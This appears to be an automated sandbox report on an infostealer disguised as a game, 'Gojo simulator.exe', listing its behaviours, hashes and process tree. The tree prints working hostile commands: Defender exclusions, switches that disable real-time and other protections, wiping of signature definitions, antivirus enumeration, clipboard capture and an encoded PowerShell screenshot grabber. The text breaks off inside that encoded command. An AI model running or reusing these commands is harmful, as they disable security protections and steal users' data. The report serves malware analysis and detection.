Analysis
-
max time kernel
14s -
max time network
15s -
platform
windows11-21h2_x64 -
resource
win11-20250410-en -
resource tags
arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system -
submitted
14/04/2025, 23:25
Behavioral task
behavioral1
Sample
dist/Gojo simulator.exe
Resource
win10ltsc2021-20250410-en
Behavioral task
behavioral2
Sample
dist/Gojo simulator.exe
Resource
win11-20250410-en
Behavioral task
behavioral3
Sample
dist/mapper/map.exe
Resource
win10ltsc2021-20250410-en
Behavioral task
behavioral4
Sample
dist/mapper/map.exe
Resource
win11-20250410-en
General
-
Target
dist/Gojo simulator.exe
-
Size
7.8MB
-
MD5
af5dd5e0736e272360fd2808eb1e570b
-
SHA1
a67924548f53e09ce4d1e4906a0a12e3cd4b1839
-
SHA256
bf89680b50b1fa2be445ffc674826d3445c98761a4c65a081e4eb5938eab1736
-
SHA512
02a6f7ad4cf9cb196b9246d2fb9c94a46b9163a71fff31f8b5dee12bd58cd6aa7175ec37d71a1ce8fa320af222af86e4f236ed44b3c29989d58c4a5ffa8aed57
-
SSDEEP
196608:mW1CHUOXXKApOgj9fZwQRCgiIKpdzjPOan7j2y283TOnOh:YxMUw8wIKppDO9ih
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4476 powershell.exe 2368 powershell.exe 5592 powershell.exe 1856 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 5960 cmd.exe 3992 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2956 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 4508 Gojo simulator.exe 4508 Gojo simulator.exe 4508 Gojo simulator.exe 4508 Gojo simulator.exe 4508 Gojo simulator.exe 4508 Gojo simulator.exe 4508 Gojo simulator.exe 4508 Gojo simulator.exe 4508 Gojo simulator.exe 4508 Gojo simulator.exe 4508 Gojo simulator.exe 4508 Gojo simulator.exe 4508 Gojo simulator.exe 4508 Gojo simulator.exe 4508 Gojo simulator.exe 4508 Gojo simulator.exe 4508 Gojo simulator.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 3 discord.com 5 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 5152 tasklist.exe 5788 tasklist.exe 488 tasklist.exe -
resource yara_rule behavioral2/files/0x001c00000002b101-21.dat upx behavioral2/memory/4508-25-0x00007FFA8F980000-0x00007FFA8FFE7000-memory.dmp upx behavioral2/files/0x001900000002b0ee-28.dat upx behavioral2/memory/4508-48-0x00007FFA999B0000-0x00007FFA999BF000-memory.dmp upx behavioral2/memory/4508-47-0x00007FFA943F0000-0x00007FFA94417000-memory.dmp upx behavioral2/files/0x001900000002b0f7-46.dat upx behavioral2/files/0x001900000002b0f6-45.dat upx behavioral2/files/0x001c00000002b0f5-44.dat upx behavioral2/files/0x001a00000002b0f4-43.dat upx behavioral2/files/0x001900000002b0f1-42.dat upx behavioral2/files/0x001900000002b0f0-41.dat upx behavioral2/files/0x001c00000002b0ef-40.dat upx behavioral2/files/0x001900000002b0eb-39.dat upx behavioral2/files/0x001900000002b108-38.dat upx behavioral2/files/0x001e00000002b107-37.dat upx behavioral2/files/0x001900000002b106-36.dat upx behavioral2/files/0x001900000002b100-33.dat upx behavioral2/files/0x001a00000002b0fc-32.dat upx behavioral2/files/0x004600000002b0fd-30.dat upx behavioral2/memory/4508-50-0x00007FFA99910000-0x00007FFA9992A000-memory.dmp upx behavioral2/memory/4508-52-0x00007FFA94350000-0x00007FFA9437B000-memory.dmp upx behavioral2/memory/4508-58-0x00007FFA94320000-0x00007FFA94345000-memory.dmp upx behavioral2/memory/4508-60-0x00007FFA8F7F0000-0x00007FFA8F979000-memory.dmp upx behavioral2/memory/4508-62-0x00007FFA990D0000-0x00007FFA990E9000-memory.dmp upx behavioral2/memory/4508-64-0x00007FFA998E0000-0x00007FFA998ED000-memory.dmp upx behavioral2/memory/4508-71-0x00007FFA8C4B0000-0x00007FFA8C9E3000-memory.dmp upx behavioral2/memory/4508-73-0x00007FFA901A0000-0x00007FFA9026E000-memory.dmp upx behavioral2/memory/4508-77-0x00007FFA95520000-0x00007FFA9552D000-memory.dmp upx behavioral2/memory/4508-76-0x00007FFA984F0000-0x00007FFA98504000-memory.dmp upx behavioral2/memory/4508-80-0x00007FFA8F730000-0x00007FFA8F7E3000-memory.dmp upx behavioral2/memory/4508-79-0x00007FFA99910000-0x00007FFA9992A000-memory.dmp upx behavioral2/memory/4508-70-0x00007FFA93350000-0x00007FFA93383000-memory.dmp upx behavioral2/memory/4508-69-0x00007FFA8F980000-0x00007FFA8FFE7000-memory.dmp upx behavioral2/memory/4508-101-0x00007FFA94350000-0x00007FFA9437B000-memory.dmp upx behavioral2/memory/4508-200-0x00007FFA94320000-0x00007FFA94345000-memory.dmp upx behavioral2/memory/4508-265-0x00007FFA8F7F0000-0x00007FFA8F979000-memory.dmp upx behavioral2/memory/4508-267-0x00007FFA990D0000-0x00007FFA990E9000-memory.dmp upx behavioral2/memory/4508-295-0x00007FFA8C4B0000-0x00007FFA8C9E3000-memory.dmp upx behavioral2/memory/4508-294-0x00007FFA93350000-0x00007FFA93383000-memory.dmp upx behavioral2/memory/4508-306-0x00007FFA901A0000-0x00007FFA9026E000-memory.dmp upx behavioral2/memory/4508-321-0x00007FFA8F730000-0x00007FFA8F7E3000-memory.dmp upx behavioral2/memory/4508-307-0x00007FFA8F980000-0x00007FFA8FFE7000-memory.dmp upx behavioral2/memory/4508-313-0x00007FFA8F7F0000-0x00007FFA8F979000-memory.dmp upx behavioral2/memory/4508-346-0x00007FFA93350000-0x00007FFA93383000-memory.dmp upx behavioral2/memory/4508-348-0x00007FFA95520000-0x00007FFA9552D000-memory.dmp upx behavioral2/memory/4508-347-0x00007FFA8C4B0000-0x00007FFA8C9E3000-memory.dmp upx behavioral2/memory/4508-345-0x00007FFA998E0000-0x00007FFA998ED000-memory.dmp upx behavioral2/memory/4508-344-0x00007FFA990D0000-0x00007FFA990E9000-memory.dmp upx behavioral2/memory/4508-343-0x00007FFA8F7F0000-0x00007FFA8F979000-memory.dmp upx behavioral2/memory/4508-342-0x00007FFA94320000-0x00007FFA94345000-memory.dmp upx behavioral2/memory/4508-341-0x00007FFA94350000-0x00007FFA9437B000-memory.dmp upx behavioral2/memory/4508-340-0x00007FFA99910000-0x00007FFA9992A000-memory.dmp upx behavioral2/memory/4508-339-0x00007FFA901A0000-0x00007FFA9026E000-memory.dmp upx behavioral2/memory/4508-338-0x00007FFA943F0000-0x00007FFA94417000-memory.dmp upx behavioral2/memory/4508-337-0x00007FFA999B0000-0x00007FFA999BF000-memory.dmp upx behavioral2/memory/4508-336-0x00007FFA8F730000-0x00007FFA8F7E3000-memory.dmp upx behavioral2/memory/4508-334-0x00007FFA984F0000-0x00007FFA98504000-memory.dmp upx behavioral2/memory/4508-322-0x00007FFA8F980000-0x00007FFA8FFE7000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2724 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 5032 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 4476 powershell.exe 2368 powershell.exe 4476 powershell.exe 2368 powershell.exe 3992 powershell.exe 3992 powershell.exe 6012 powershell.exe 6012 powershell.exe 3992 powershell.exe 6012 powershell.exe 5592 powershell.exe 5592 powershell.exe 4912 powershell.exe 4912 powershell.exe 1856 powershell.exe 1856 powershell.exe 3516 powershell.exe 3516 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4476 powershell.exe Token: SeDebugPrivilege 2368 powershell.exe Token: SeDebugPrivilege 5152 tasklist.exe Token: SeDebugPrivilege 5788 tasklist.exe Token: SeIncreaseQuotaPrivilege 4164 WMIC.exe Token: SeSecurityPrivilege 4164 WMIC.exe Token: SeTakeOwnershipPrivilege 4164 WMIC.exe Token: SeLoadDriverPrivilege 4164 WMIC.exe Token: SeSystemProfilePrivilege 4164 WMIC.exe Token: SeSystemtimePrivilege 4164 WMIC.exe Token: SeProfSingleProcessPrivilege 4164 WMIC.exe Token: SeIncBasePriorityPrivilege 4164 WMIC.exe Token: SeCreatePagefilePrivilege 4164 WMIC.exe Token: SeBackupPrivilege 4164 WMIC.exe Token: SeRestorePrivilege 4164 WMIC.exe Token: SeShutdownPrivilege 4164 WMIC.exe Token: SeDebugPrivilege 4164 WMIC.exe Token: SeSystemEnvironmentPrivilege 4164 WMIC.exe Token: SeRemoteShutdownPrivilege 4164 WMIC.exe Token: SeUndockPrivilege 4164 WMIC.exe Token: SeManageVolumePrivilege 4164 WMIC.exe Token: 33 4164 WMIC.exe Token: 34 4164 WMIC.exe Token: 35 4164 WMIC.exe Token: 36 4164 WMIC.exe Token: SeIncreaseQuotaPrivilege 4164 WMIC.exe Token: SeSecurityPrivilege 4164 WMIC.exe Token: SeTakeOwnershipPrivilege 4164 WMIC.exe Token: SeLoadDriverPrivilege 4164 WMIC.exe Token: SeSystemProfilePrivilege 4164 WMIC.exe Token: SeSystemtimePrivilege 4164 WMIC.exe Token: SeProfSingleProcessPrivilege 4164 WMIC.exe Token: SeIncBasePriorityPrivilege 4164 WMIC.exe Token: SeCreatePagefilePrivilege 4164 WMIC.exe Token: SeBackupPrivilege 4164 WMIC.exe Token: SeRestorePrivilege 4164 WMIC.exe Token: SeShutdownPrivilege 4164 WMIC.exe Token: SeDebugPrivilege 4164 WMIC.exe Token: SeSystemEnvironmentPrivilege 4164 WMIC.exe Token: SeRemoteShutdownPrivilege 4164 WMIC.exe Token: SeUndockPrivilege 4164 WMIC.exe Token: SeManageVolumePrivilege 4164 WMIC.exe Token: 33 4164 WMIC.exe Token: 34 4164 WMIC.exe Token: 35 4164 WMIC.exe Token: 36 4164 WMIC.exe Token: SeDebugPrivilege 488 tasklist.exe Token: SeDebugPrivilege 3992 powershell.exe Token: SeDebugPrivilege 6012 powershell.exe Token: SeDebugPrivilege 5592 powershell.exe Token: SeDebugPrivilege 4912 powershell.exe Token: SeIncreaseQuotaPrivilege 900 WMIC.exe Token: SeSecurityPrivilege 900 WMIC.exe Token: SeTakeOwnershipPrivilege 900 WMIC.exe Token: SeLoadDriverPrivilege 900 WMIC.exe Token: SeSystemProfilePrivilege 900 WMIC.exe Token: SeSystemtimePrivilege 900 WMIC.exe Token: SeProfSingleProcessPrivilege 900 WMIC.exe Token: SeIncBasePriorityPrivilege 900 WMIC.exe Token: SeCreatePagefilePrivilege 900 WMIC.exe Token: SeBackupPrivilege 900 WMIC.exe Token: SeRestorePrivilege 900 WMIC.exe Token: SeShutdownPrivilege 900 WMIC.exe Token: SeDebugPrivilege 900 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3676 wrote to memory of 4508 3676 Gojo simulator.exe 78 PID 3676 wrote to memory of 4508 3676 Gojo simulator.exe 78 PID 4508 wrote to memory of 4004 4508 Gojo simulator.exe 79 PID 4508 wrote to memory of 4004 4508 Gojo simulator.exe 79 PID 4508 wrote to memory of 5688 4508 Gojo simulator.exe 80 PID 4508 wrote to memory of 5688 4508 Gojo simulator.exe 80 PID 4508 wrote to memory of 4068 4508 Gojo simulator.exe 82 PID 4508 wrote to memory of 4068 4508 Gojo simulator.exe 82 PID 4004 wrote to memory of 4476 4004 cmd.exe 85 PID 4004 wrote to memory of 4476 4004 cmd.exe 85 PID 5688 wrote to memory of 2368 5688 cmd.exe 86 PID 5688 wrote to memory of 2368 5688 cmd.exe 86 PID 4068 wrote to memory of 2360 4068 cmd.exe 87 PID 4068 wrote to memory of 2360 4068 cmd.exe 87 PID 4508 wrote to memory of 3628 4508 Gojo simulator.exe 88 PID 4508 wrote to memory of 3628 4508 Gojo simulator.exe 88 PID 4508 wrote to memory of 4320 4508 Gojo simulator.exe 89 PID 4508 wrote to memory of 4320 4508 Gojo simulator.exe 89 PID 4320 wrote to memory of 5152 4320 cmd.exe 92 PID 4320 wrote to memory of 5152 4320 cmd.exe 92 PID 4508 wrote to memory of 3316 4508 Gojo simulator.exe 93 PID 4508 wrote to memory of 3316 4508 Gojo simulator.exe 93 PID 3628 wrote to memory of 5788 3628 cmd.exe 94 PID 3628 wrote to memory of 5788 3628 cmd.exe 94 PID 4508 wrote to memory of 5960 4508 Gojo simulator.exe 96 PID 4508 wrote to memory of 5960 4508 Gojo simulator.exe 96 PID 4508 wrote to memory of 3924 4508 Gojo simulator.exe 98 PID 4508 wrote to memory of 3924 4508 Gojo simulator.exe 98 PID 3316 wrote to memory of 4164 3316 cmd.exe 101 PID 3316 wrote to memory of 4164 3316 cmd.exe 101 PID 4508 wrote to memory of 5720 4508 Gojo simulator.exe 102 PID 4508 wrote to memory of 5720 4508 Gojo simulator.exe 102 PID 4508 wrote to memory of 1112 4508 Gojo simulator.exe 104 PID 4508 wrote to memory of 1112 4508 Gojo simulator.exe 104 PID 4508 wrote to memory of 5700 4508 Gojo simulator.exe 105 PID 4508 wrote to memory of 5700 4508 Gojo simulator.exe 105 PID 3924 wrote to memory of 488 3924 cmd.exe 108 PID 3924 wrote to memory of 488 3924 cmd.exe 108 PID 5960 wrote to memory of 3992 5960 cmd.exe 109 PID 5960 wrote to memory of 3992 5960 cmd.exe 109 PID 5720 wrote to memory of 5400 5720 cmd.exe 110 PID 5720 wrote to memory of 5400 5720 cmd.exe 110 PID 1112 wrote to memory of 5032 1112 cmd.exe 111 PID 1112 wrote to memory of 5032 1112 cmd.exe 111 PID 5700 wrote to memory of 6012 5700 cmd.exe 112 PID 5700 wrote to memory of 6012 5700 cmd.exe 112 PID 4508 wrote to memory of 2024 4508 Gojo simulator.exe 113 PID 4508 wrote to memory of 2024 4508 Gojo simulator.exe 113 PID 2024 wrote to memory of 1588 2024 cmd.exe 115 PID 2024 wrote to memory of 1588 2024 cmd.exe 115 PID 4508 wrote to memory of 3672 4508 Gojo simulator.exe 116 PID 4508 wrote to memory of 3672 4508 Gojo simulator.exe 116 PID 3672 wrote to memory of 3512 3672 cmd.exe 118 PID 3672 wrote to memory of 3512 3672 cmd.exe 118 PID 4508 wrote to memory of 2788 4508 Gojo simulator.exe 119 PID 4508 wrote to memory of 2788 4508 Gojo simulator.exe 119 PID 6012 wrote to memory of 5272 6012 powershell.exe 121 PID 6012 wrote to memory of 5272 6012 powershell.exe 121 PID 2788 wrote to memory of 6092 2788 cmd.exe 122 PID 2788 wrote to memory of 6092 2788 cmd.exe 122 PID 4508 wrote to memory of 1140 4508 Gojo simulator.exe 123 PID 4508 wrote to memory of 1140 4508 Gojo simulator.exe 123 PID 1140 wrote to memory of 3192 1140 cmd.exe 125 PID 1140 wrote to memory of 3192 1140 cmd.exe 125
Processes
-
C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe"C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe"C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4508 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:5688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('LOADED', 0, 'Load in game', 48+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('LOADED', 0, 'Load in game', 48+16);close()"4⤵PID:2360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:3316 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:5960 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:5720 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:5400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:5032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:5700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuA